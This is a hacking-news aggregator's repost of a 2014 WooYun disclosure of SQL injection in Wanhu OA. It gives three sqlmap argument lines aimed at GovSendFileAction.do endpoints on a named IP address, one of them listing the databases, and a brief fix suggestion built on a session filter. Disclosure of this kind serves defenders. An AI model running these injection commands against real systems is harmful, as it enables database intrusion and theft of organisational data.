记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

万户OA 无限制多参数sql注入

2014-12-17 15:45

注入1: -u "http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?editId=2&action=listLoad" --dbms="Microsoft SQL Servcer" --dbs

注入2: -u "http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=modify"

注入3: -u "http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=delete"

漏洞证明:

11.jpg

修复方案:

把action 的位置配置下 比如 后台访问的 就加个 /manager/***.do 然后在加一个filter 里面过滤为登陆的session 就能解决大部分了

知识来源: www.wooyun.org/bugs/wooyun-2014-076376

阅读:54990 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“万户OA 无限制多参数sql注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云